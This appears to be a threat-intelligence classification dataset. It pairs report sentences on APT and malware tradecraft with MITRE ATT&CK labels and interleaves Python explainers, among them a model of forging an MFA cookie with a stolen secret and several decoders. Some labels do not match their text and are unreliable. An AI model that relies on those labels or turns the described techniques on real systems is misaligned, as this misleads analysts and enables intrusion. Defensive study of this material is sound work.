{"text1":"Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile. Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140, which is registered to CNIIHM. This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities. It also has engaged in network reconnaissance against targets of interest to TEMP.Veles. The IP address has been tied to additional malicious activity in support of the TRITON intrusion","labels":"['T1059.001']"}
|
|
{"text1":"On the first contact, it will send an identification of the victim based on the hard disk volume serial number. Talos didn't identify any kind of anti-sandboxing mechanisms on it, either","labels":"['T1082']"}
|
|
{"text1":"When checking network connections with the \u201cnetstat\u201d command, both cases use the \u201c-naop\u201d option in conjunction with \u201ctcp\u201d - Filtering the result, both cases use the \u201cfindstr\u201d command instead of \u201cfind","labels":"['T1049']"}
|
|
{"text1":"This module was delivered, like many other tools, in a 7z self-extracting archive. Inside, there was a password-protected RAR archive containing a few files","labels":"['T1027']"}
|
|
{"text1":"For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP","labels":"['T1071.001', 'T1041', 'T1071', 'T1132']"}
|
|
{"text1":"FIN5, which earlier this year was profiled by researchers at Trend Micro and has been in action since at least 2008, uses real credentials from the victim organization's virtual private network, Remote Desktop Protocol, Citrix, or VNC. Vengerik says the attackers got those credentials via third parties associated with the victims' POS systems","labels":"['T1078', 'T1133']"}
|
|
{"text1":"The first action performed by the crypter code is to check for a specific registry key. If the key is not detected, the crypter will enter an infinite loop or exit; thus it is used as an anti-analysis technique","labels":"['T1012', 'T1497.001']"}
|
|
{"text1":"The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April. The worm specifically scans for the existence of the DoublePulsar backdoor on compromised systems. If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the EternalBlue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock. The second thread scans randomly chosen external IP addresses","labels":"['T1018']"}
|
|
{"text1":"Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive","labels":"['T1053.005', 'T1547.001']"}
|
|
{"text1":"The actor has used this method in its 2019 campaign as well. This UAC bypass starts by executing wusa.exe using ShellExecuteExW and gets its access token using NtOpenProcessToken. Then the access token of wusa.exe is duplicated using NtDuplicateToken. The DesiredAccess parameter of this function specifies the requested access rights for the new token. In this case the actor passed TOKEN_ALL_ACCESS as the DesiredAccess value, which indicates that the new token has the combination of all access rights of the current token. The duplicated token is then passed to ImpersonateLoggedOnUser, and then a cmd instance is spawned using CreateProcessWithLogonW. At the end the duplicated token is assigned to the created thread using NtSetInformationThread to make it elevated","labels":"['T1134.002']"}
|
|
{"text1":"The main infection vector for Poseidon is the use of spear-phishing emails including RTF\/DOC files, usually with a human resources lure. Poseidon\u2019s toolkit displays an awareness of many antivirus providers over the years, attempting to attack or spoof these processes as a means of self-defense for their infections","labels":"['T1036.005']"}
|
|
{"text1":"On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year earlier, in January 2017. This repeat attack may suggest that the adversaries have lost their foothold in the targeted organization, or that it may be considered a high value target. A New Attack. On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1204.001']"}
|
|
{"text1":"PlugX \u2014 A remote access tool notable for communications that may contain HTTP headers starting with \"X-\" (e.g. \"X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords","labels":"['T1071.001']"}
|
|
{"text1":"1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs","labels":"['T1204.001']"}
|
|
{"text1":"After the credit cards are first scanned in real time, the personal account number (PAN) and accompanying data sits in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. During that time, the point-of-sale malware opens up the process memory searching for elements related to credit card information","labels":"['T1005']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified a builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018at\u2019 or \u2018schtask\u2019 commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1053.002', 'T1053.005']"}
|
|
{"text1":"The kernel driver is a commercial product that the attackers are abusing called RawDisk by EldoS Corporation, which provides direct access to files, disks and partitions. It appears that the \u201cdrdisk.sys\u201d driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. With the kernel driver installed, the wiper can begin writing to protected system locations, such as the master boot record (MBR) and partition tables of storage volumes. If the wiper is configured with the \"E\" setting, the wiper will encrypt the contents of the file using a random value as a key and the RC4 algorithm. If configured with the \"R\" setting, the wiper will overwrite files with the random values that would be used as a key in \"E","labels":"['T1561.002', 'T1485', 'T1485']"}
|
|
{"text1":"The new domain names follow the same pattern as previously reported, except that they swap the top level domain name for another. We know that the threat actor has used the \u201c.me\u201d TLD in their past campaigns against some academic institutions and this is still the case, alongside \u201c.tk\u201d and \u201c.cf","labels":"['T1583.001']"}
|
|
{"text1":"The group's primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443. After connecting to its C2 server, RCSession checks in with an encrypted beacon and then awaits instruction. The ORat tool, which appears to be used less frequently by the group, communicates over TCP port 80 using a raw socket protocol (not HTTP","labels":"['T1573']"}
|
|
{"text1":"Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. It also gathers network information such as the MAC address, IP address, WINS, DHCP server, and gateway","labels":"['T1016']"}
|
|
{"text1":"The two main changes are the obfuscation and the network protocol used to communicate with the C2 server. The developers used two different obfuscation algorithms: one for the C2 encoding and one for the data. The C2 encoding is a simple XOR (as in 2012). The C2 communication is also different. As the data are now sent with the GET method, the data must be in ASCII. That's why they add base64 encoding in order to get supported characters in the HTTP query. For the first time, the developer switched from POST requests to GET requests: the exfiltrated data is appended to the URL. Here is the pattern: hxxp:\/\/C2_domain\/MalwareIDVictimIPThirdIDExfiltratedDataBase64 SHA256:37d1bd82527d50df3246f12b931c69c2b9e978b593a64e89d16bfe0eb54645b0 C2 URL:hxxp:\/\/www[.]amanser951[.]otzo[.]com\/uiho0.0.0.0edrftg.txt","labels":"['T1041']"}
|
|
{"text1":"The malware sets information like the C2 server, ID, the downloaded payload, and the decoded project.aspx in a registry key under \u201cHKCU\\Software\\ApplicationContainer\\Appsw64\u201d. These keys will be used in the second stage","labels":"['T1112']"}
|
|
{"text1":"The Helminth executable variant is able to run batch scripts provided by the C2 server, which is very similar to the script version of this Trojan. The executable variant has one additional capability that is not present in the script version, which involves the ability to log keystrokes via a supplemental keylogger module","labels":"['T1059.003', 'T1115', 'T1056.001']"}
|
|
{"text1":"The ransom note instructs the victim to use a unique URL to decrypt their files. Victims must provide the key and extension name included in the ransom note. The key specified in the ransom note is the Base64-encoded representation of the encrypted stat data stored in the registry","labels":"['T1486']"}
|
|
{"text1":"1) Ferocious dropper: The Excel dropper, after the user opens it and disables the protected mode, will execute a series of formulas placed in a hidden column. Initially, they will hide the main spreadsheet that requested the user to \u201cenable editing\u201d, then unhide a secondary spreadsheet that contains the decoy, to avoid raising suspicion. Otherwise, the macro will open a temporary %ProgramData%\\winrm.txt file and save a VBS stager to %ProgramData%\\winrm.vbs and set up registry keys for persistence. 5) Ferocious run-1: After the macro finishes writing to disk, it runs winrm.vbs using explorer.exe. The VBS script will also add two important registry keys for persistence. The persistence technique observed in all intrusions uses COM hijacking. In this technique, the threat actor is able to add a Class ID in the current user registry hive (HKCU) referencing the malicious VBS script written previously to %ProgramData%\\winrm.vbs. Registry keys used for COM hijacking After the above execution chain, the Excel 4.0 macro will clean up and delete the winrm.vbs and winrm.txt files. 6) Ferocious run-2: The macro will continue after the cleanup by recreating and opening the same files, winrm.vbs and winrm.txt","labels":"['T1112']"}
|
|
{"text1":"All the strings used by the malware are encrypted and are decrypted by Rijndael\u00a0symmetric encryption algorithm in the \u201c<Module>.\\u200E\u201d function","labels":"['T1027']"}
|
|
{"text1":"They dumped specific hives from the Windows Registry, such as the SAM hive, which contains password hashes","labels":"['T1005']"}
|
|
{"text1":"Volexity's investigation into this incident determined the attacker had accessed the Duo integration secret key (akey) from the OWA server. This key then allowed the attacker to derive a pre-computed value to be set in the duo-sid cookie. After successful password authentication, the server evaluated the duo-sid cookie and determined it to be valid. This allowed the attacker with knowledge of a user account and password to then completely bypass the MFA set on the account. It should be noted this is not a vulnerability with the MFA provider and underscores the need to ensure that all secrets associated with key integrations, such as those with an MFA provider, should be changed following a breach. Further, it is important that not only are passwords changed after a breach, but that passwords are not set to something similar to the previous password (e.g","labels":"['T1550.004', 'T1606.001']"}
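Added example, not part of the Volexity write-up and not Duo's real cookie format: a simplified model of the mechanism the record describes. After password authentication the server checks a cookie that says "second factor already satisfied", and it trusts any cookie whose signature verifies under the integration secret. Whoever holds that secret can mint such a cookie, a password change on its own does nothing to the cookie, and rotating the secret is what invalidates everything minted under the old one. Secret values and the user name are constructed.

```python
import base64
import hashlib
import hmac
from typing import Optional

# Simplified model (an assumption, not Duo's real format): the "second factor
# done" cookie is <base64(user|expiry)>.<HMAC-SHA256 under the integration secret>.


def _sign(secret: bytes, payload: bytes) -> str:
    return hmac.new(secret, payload, hashlib.sha256).hexdigest()


def mint_mfa_cookie(secret: bytes, username: str, expires_at: int) -> str:
    """What the server does after a successful second factor, and exactly what an
    attacker holding `secret` can do without ever touching the second factor."""
    payload = f"{username}|{expires_at}".encode("utf-8")
    return base64.urlsafe_b64encode(payload).decode("ascii") + "." + _sign(secret, payload)


def verify_mfa_cookie(secret: bytes, cookie: str, now: int) -> Optional[str]:
    """Return the username the cookie vouches for, or None if it is not valid under `secret`."""
    try:
        b64, sig = cookie.rsplit(".", 1)
        payload = base64.urlsafe_b64decode(b64)
        username, expires = payload.decode("utf-8").rsplit("|", 1)
        expires_at = int(expires)
    except ValueError:          # malformed cookie, bad base64 or non-numeric expiry
        return None
    if not hmac.compare_digest(_sign(secret, payload), sig):
        return None
    if expires_at < now:
        return None
    return username


def breach_scenario(now: int = 1_700_000_000) -> dict:
    """Walk through the incident as the model describes it, with constructed secrets."""
    stolen_secret = b"constructed-integration-secret-v1"   # read off the compromised server
    forged = mint_mfa_cookie(stolen_secret, "victim@example.test", now + 3600)
    # The attacker also knows the password, so the cookie check is all that is left.
    before_rotation = verify_mfa_cookie(stolen_secret, forged, now)
    # Changing the password does not touch the cookie; the server still accepts it.
    after_password_change = verify_mfa_cookie(stolen_secret, forged, now)
    # Rotating the integration secret kills every cookie minted under the old one.
    rotated_secret = b"constructed-integration-secret-v2"
    after_rotation = verify_mfa_cookie(rotated_secret, forged, now)
    return {"before_rotation": before_rotation,
            "after_password_change": after_password_change,
            "after_rotation": after_rotation}
```

The post-breach checklist the record argues for falls out of `breach_scenario`: rotate every integration secret the compromised host could read, not only user passwords, and treat any MFA-completion state issued before the rotation as forged.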
|
|
{"text1":"The legitimate DLL that would be used in this case has the size of roughly 600 KB, but here we have an obfuscated library that is over 600 MB. The large size of the file is intended to hamper analysis and detection. Once all empty sections have been removed from the library, the final payload is a binary of 27.5 MB","labels":"['T1027.001']"}
|
|
{"text1":"Generally, the malware uses AutoIt or VBS scripts added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions","labels":"['T1574.001']"}
|
|
{"text1":"Gamaredon is an advanced persistent threat (APT) group that has been active since 2013. From late 2019 to February of this year, researchers published several reports on Gamaredon, tracking the group\u2019s activities","labels":"['T1140', 'T1059.005']"}
|
|
{"text1":"When you run the command, it sets all the required information about the AD FS to Azure AD for the federated domain. It also creates a relying party trust for the Azure AD to the local AD FS server. When a user is authenticated on AD FS, it creates a security token including claims about the user\u2019s identity. With Azure AD, two claims are used for authentication; UserPrincipalName and ImmutableId. Basically, the ImmutableId could be any string, as long as it matches the ImmutableId attribute of the user object in Azure AD. Typically the ImmutableId is a base 64 encoded GUID of the user object in on-premises AD (to convert GUID to immutable ID see the tools page). Converting the domain to federated also creates two claim issuance rules. In short, the rules add the UserPrincipalName and ImmutableId claims of the logged in user to the security token. When the security token is delivered to the Azure authentication platform, it checks the token signature, and if it matches the trust, the user is granted access","labels":"['T1484']"}
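Added example, not from the text above: the GUID-to-ImmutableId conversion the record refers to, and the two-claim match it describes. The ImmutableId is base64 over the 16 raw objectGUID bytes as AD stores them (the mixed-endian GUID layout, `uuid.bytes_le` in Python), not over the dashed text form. `claims_match_user` mirrors the point that the ImmutableId is compared as an opaque string, so any token carrying the right value for a user passes once the signature is trusted. The GUIDs and user records are constructed.

```python
import base64
import uuid


def guid_to_immutable_id(object_guid: str) -> str:
    """Base64 of the 16 objectGUID bytes in the layout AD stores them (uuid.bytes_le)."""
    return base64.b64encode(uuid.UUID(object_guid).bytes_le).decode("ascii")


def immutable_id_to_guid(immutable_id: str) -> str:
    """Reverse conversion, e.g. to find the on-premises object behind a token claim."""
    raw = base64.b64decode(immutable_id, validate=True)
    if len(raw) != 16:
        raise ValueError("ImmutableId does not decode to 16 GUID bytes")
    return str(uuid.UUID(bytes_le=raw))


def token_claims_for(upn: str, object_guid: str) -> dict:
    """The two claims the issuance rules add to the security token."""
    return {"UserPrincipalName": upn, "ImmutableId": guid_to_immutable_id(object_guid)}


def claims_match_user(claims: dict, azure_user: dict) -> bool:
    """Mirror of the match described above: UPN compared case-insensitively,
    ImmutableId compared as an opaque string against the user object's attribute."""
    return (claims.get("UserPrincipalName", "").lower() == azure_user["userPrincipalName"].lower()
            and claims.get("ImmutableId") == azure_user["immutableId"])
```

Because the match is purely on those two strings plus the signature, the defensive control is the signing trust itself: the token-signing certificate of the AD FS farm, and who can export or replace it, decides which ImmutableId values can be asserted.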
|
|
{"text1":"NICKEL used compromised credentials to sign into victims\u2019 Microsoft 365 accounts through normal sign-ins with a browser and the legacy Exchange Web Services (EWS) protocol to review and collect victim emails. MSTIC has observed successful NICKEL sign-ins to compromised accounts through commercial VPN providers as well as from actor-controlled infrastructure","labels":"['T1133', 'T1078.004']"}
|
|
{"text1":"By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file. The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) contains the following formula that Excel will save to the \u201cA0\u201d cell in the worksheet","labels":"['T1204.002']"}
|
|
{"text1":"After the system reboots, the file \u201cAJWrDz.exe\u201d executes, which in turn triggers the side-loading of the malicious (and fake) DLL file \u201cdbghelp.dll\u201d. This malicious DLL file injects itself to Windows Media Player process \u2014 wmplayer.exe, and reflectively loads the renamed jesus.dmp file, \u201cAJWrDz.dmp","labels":"['T1055.001']"}
|
|
{"text1":"The Emissary Trojan will use this GUID value provided by the C2 server as an encryption key that it will use to encrypt data sent in subsequent network communications","labels":"['T1027', 'T1573.001']"}
|
|
{"text1":"It also checks for the existence of various tools and utilities that malware analysts often run when analyzing malicious software. It also leverages Structured Exception Handling (SEH) to patch its own code. These measures are all designed to impede the analysis process and make it more expensive to identify what the malware is actually designed to do from a code execution flow perspective. Below, the EAX register is stored in a variable to be reused later in order to allocate a heap memory chunk to initiate its own unpacked code. The malware also uses other techniques to make analysis significantly more difficult, like creating hundreds of case comparisons, which makes tracing code much harder. Below is an example of several if conditional statements in pseudo code demonstrating this process and how it can result in impeding the ability to efficiently trace the code. In order to decrypt the malware code it installs an exception handler, which is responsible for decrypting some memory bytes to continue its execution. Below you can see the SEH has just been initialized: In the same routine, it performs the decryption routine for the following code. The strings are encrypted using an XOR value, however each string uses a separate XOR value preventing an easy detection mechanism. Below is some IDA Python code which can be used to decrypt strings","labels":"['T1027']"}
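Added example, not the IDA Python script the record refers to: a stand-alone decryptor for a string table in which every entry carries its own single-byte XOR key. The table layout (1-byte key, 2-byte little-endian length, then the encrypted NUL-terminated string) is an assumption chosen for the example; real samples differ, but the walk-and-decrypt loop and the returned offsets are what you would port into IDA to annotate the decrypted strings. `recover_key_from_terminator` shows why per-string keys buy the author less than they hope: a NUL-terminated plaintext leaks the key in the last ciphertext byte. The strings and keys below are constructed.

```python
import struct


def xor_with(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def pack_string_table(strings, keys) -> bytes:
    """Build a blob in the assumed layout: 1-byte key, 2-byte little-endian length,
    then the XOR-encrypted NUL-terminated string. Used here only to construct sample data."""
    out = bytearray()
    for text, key in zip(strings, keys):
        enc = xor_with(text.encode("latin-1") + b"\x00", key)
        out += struct.pack("<BH", key, len(enc)) + enc
    return bytes(out)


def decrypt_string_table(blob: bytes) -> list:
    """Walk the table and decrypt every entry with its own key.
    Returns (offset, key, plaintext) so each result can be commented back at its address."""
    off, result = 0, []
    while off + 3 <= len(blob):
        key, length = struct.unpack_from("<BH", blob, off)
        off += 3
        chunk = blob[off:off + length]
        if len(chunk) != length:
            raise ValueError(f"truncated entry at offset {off}")
        plain = xor_with(chunk, key).rstrip(b"\x00").decode("latin-1")
        result.append((off, key, plain))
        off += length
    return result


def recover_key_from_terminator(ciphertext: bytes) -> int:
    """If the stored key is missing or suspect: a NUL-terminated plaintext means the
    last ciphertext byte is 0x00 XOR key, i.e. the key itself."""
    return ciphertext[-1]
```

The same loop, with `blob` replaced by bytes read from the database at the table's address and `result` fed to a comment-setting call, is the IDA Python script the analysis describes.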
|
|
{"text1":"There are 2 ways by which Linux\/Ebury can choose a server where the DNS packets are sent. The second method uses an algorithm to generate a domain name dynamically. This domain name will be queried for its A and TXT records. The TXT record will be used to verify that it is under the control of the operators using public key cryptography. Details about the domain generation algorithm and the verification processed will be published later","labels":"['T1568.002']"}
|
|
{"text1":"After the Waterbear DLL loader is executed, it searches for a hardcoded path and tries to decrypt the corresponding payload, which is a piece of encrypted shellcode. If the decrypted payload is valid, it picks a specific existing Windows Service \u2014 LanmanServer, which is run by svchost.exe \u2014 and injects the decrypted shellcode into the legitimate service","labels":"['T1055']"}
|
|
{"text1":"The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs","labels":"['T1056.001', 'T1056']"}
|
|
{"text1":"Process hollowing is a code injection technique that involves spawning a new instance of a legitimate process (in this case c:\\windows\\syswow64\\explorer.exe) and then replacing the legitimate code with malware","labels":"['T1055.012']"}
|
|
{"text1":"The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. Below shows the RC4 key \"sV. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server","labels":"['T1573.001']"}
|
|
{"text1":"A series of xor 0x28 loops decrypt the contents of a self-deletion batch file, which is then written to disk and executed. Later in the execution, a more complex rc4 loop decrypts the download url and other strings and imports","labels":"['T1140']"}
|
|
{"text1":"FALLCHILL is the primary component of a C2 infrastructure that uses multiple proxies to obfuscate network traffic between HIDDEN COBRA actors and a victim\u2019s system. According to trusted third-party reporting, communication flows from the victim\u2019s system to HIDDEN COBRA actors using a series of proxies as shown in figure 1","labels":"['T1090.002']"}
|
|
{"text1":"Ferocious Kitten is an APT group that since at least 2015 has been targeting Persian-speaking individuals who appear to be based in Iran. Although it has been active for a long time, the group has mostly operated under the radar and has not been covered by security researchers to the best of our knowledge. It is only recently that it drew attention when a lure document was uploaded to VirusTotal and went public thanks to researchers on Twitter. Since then, one of its implants has been analyzed by a Chinese threat intelligence firm","labels":"['T1566.001']"}
|
|
{"text1":"The malware encrypts user files, demanding a fee of either $300 or $600 worth of bitcoins to an address specified in the instructions displayed after infection","labels":"['T1486']"}
|
|
{"text1":"In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules","labels":"['T1012']"}
|
|
{"text1":"Much of the code inside the script is from the library \u201cjs-cookie\u201d version 2.2.1. However, the attackers modified it and integrated a credit card skimmer into the original script. The skimmer binds at the events \u201cmousedown\u201d and \u201ctouchstart\u201d of the payment submit button","labels":"['T1119']"}
|
|
{"text1":"From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Exploitation and Malware Execution . Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. When the malicious RTF document is opened, two things happen that allow the attacker malware to run. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message","labels":"['T1203']"}
|
|
{"text1":"In addition to this, as reported by our peers at ESET last week, the group has also begun using a UEFI (Unified Extensible Firmware Interface) rootkit known as Lojax. Because the rootkit resides within a computer\u2019s flash memory, it allows the attackers to maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled","labels":"['T1014']"}
|
|
{"text1":"f) Hadoop YARN ResourceManager \u2013 Command Execution (exploit) g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability","labels":"['T1203', 'T1203', 'T1105']"}
|
|
{"text1":"shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. tabDll Module used to spread into the network using the EternalRomance exploit","labels":"['T1210']"}
|
|
{"text1":"The s.exe (SHA256: 04f48ed27a83a57a971e73072ac5c769709306f2714022770fb364fd575fd462) uploaded to the error2.aspx webshell is a self-extracting 7-zip archive that is an example of the HyperBro backdoor. According to Kaspersky and SecureWorks research, HyperBro is a custom backdoor developed and used by Emissary Panda in their attack campaigns. This sample of HyperBro is similar to the sample discussed in Kaspersky\u2019s research, specifically using a legitimate pcAnywhere application to sideload a DLL to decrypt, decompress and run a payload embedded within a file named \u2018thumb.db\u2019. Table 5 shows the three files associated with this HyperBro sample, which have the same file names as the self-extracting 7zip archives mentioned in Kaspersky\u2019s blog (SHA256 hashes: 34a542356ac8a3f6e367c6827b728e18e905c71574b3813f163e043f70aa3bfa and 2144aa68c7b2a6e3511e482d6759895210cf60c67f14b9485a0236af925d8233","labels":"['T1574.002']"}
|
|
{"text1":"The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps","labels":"['T1027']"}
|
|
{"text1":"COMSysApp service is first configured to autostart and the binpath of the service is set to svchost.exe. COMSysApp service is added under the \u201cSvcHost\u201d key as a preliminary step to its execution in the context of svchost.exe. The malicious DLL is added as a service DLL of COMSysApp. COMSysApp service is restarted","labels":"['T1546.015']"}
|
|
{"text1":"One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143","labels":"['T1571']"}
|
|
{"text1":"Currently, Agent Tesla continues to be utilized in various stages of attacks. Agent Tesla is now able to harvest configuration data and credentials from a number of common VPN clients, FTP and Email clients, and Web Browsers. The malware has the ability to extract credentials from the registry as well as related configuration or support files. Our analysis of a swatch of current Agent Tesla samples reveals the following list of targeted software","labels":"['T1552.002', 'T1552.001']"}
|
|
{"text1":"Next, BoomBox downloads an encrypted file from Dropbox. For demonstration purposes, an example HTTP(s) POST request used to download the encrypted file from Dropbox is shown below","labels":"['T1071.001']"}
|
|
{"text1":"Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. The keylogger itself does not communicate with the C2 or write to disk. Instead, it writes its keylog to a registry key that it uses as a buffer. During its operation, the RAT scrapes and clears this buffer before transmitting the logged keystrokes to the C2 server","labels":"['T1132.001']"}
|
|
{"text1":"The algorithm used by Dyre for generating the AES and IV from the first 48 bytes of data based on a rehashing scheme was commonly referred to as Dyre\u2019s derive_key function, this function was slightly changed in the new bot","labels":"['T1573.001']"}
|
|
{"text1":"Figure 1 \u2013 The wrapper DLL poses as a legitimate mpr.dll library, both by its name and version info","labels":"['T1036.005']"}
|
|
{"text1":"For this analysis, we looked at version 2.14.845, which has a configuration that differs from the others Dreambot versions in that the domain generation algorithm (DGA) is not used: therefore, the DGA variables and parameters are missing","labels":"['T1568.002']"}
|
|
{"text1":"Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. Instead, it writes its keylog to a registry key that it uses as a buffer","labels":"['T1027', 'T1059.001']"}
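Added example for the two DarkWatchman records above (not code from the original analysis): pulling a Base64-encoded PowerShell command out of a registry value and triaging it offline. PowerShell's own `-EncodedCommand` convention is base64 over UTF-16LE, so the decoder recognises that by the NUL high bytes and falls back to UTF-8 otherwise. The triage flags the two things this sample is known for: on-the-fly C# compilation and registry paths that could be the keylog buffer. The sample script, its registry paths and type names are constructed, not taken from the malware.

```python
import base64
import re

_REG_PATH = re.compile(r"""HK(?:LM|CU|CR|U|CC|EY_[A-Z_]+):?\\[^\s'"]+""")
_COMPILE_MARKERS = ("add-type", "csc.exe", "csharpcodeprovider", "compileassemblyfromsource")

# Constructed stand-in for the registry-stored script; not the real DarkWatchman code.
SAMPLE_SCRIPT = r"""
$src = (Get-ItemProperty -Path 'HKCU:\Software\Constructed\Loader').Source
Add-Type -TypeDefinition $src
[Constructed.Keylogger]::Run('HKCU:\Software\Constructed\Buffer')
"""


def encode_powershell(script: str, utf16: bool = True) -> str:
    """Produce the stored form: base64 over UTF-16LE (the -EncodedCommand convention)
    or over UTF-8 for writers that do not follow it."""
    raw = script.encode("utf-16-le") if utf16 else script.encode("utf-8")
    return base64.b64encode(raw).decode("ascii")


def decode_powershell(b64: str) -> str:
    """Recover the script text from a base64 blob read out of a registry value.
    ASCII text in UTF-16LE has a 0x00 in every odd position; that is the tell."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) * 2 > len(raw) // 2:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def triage(script: str) -> dict:
    """Flags that matter for this sample: does the script compile C# on the fly,
    and which registry paths does it touch (candidate keylog buffer)."""
    lowered = script.lower()
    return {
        "compiles_csharp": any(m in lowered for m in _COMPILE_MARKERS),
        "registry_paths": _REG_PATH.findall(script),
    }
```

The registry paths `triage` returns are the ones to watch in Sysmon registry events: a value under such a key that keeps growing and is periodically emptied is the buffer-scrape-and-clear behaviour the record describes.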
|
|
{"text1":"As part of its initialization, the implant gathers basic system information and sends it to its hardcoded control server 203.131.222.83 using SSL over port 443","labels":"['T1124']"}
|
|
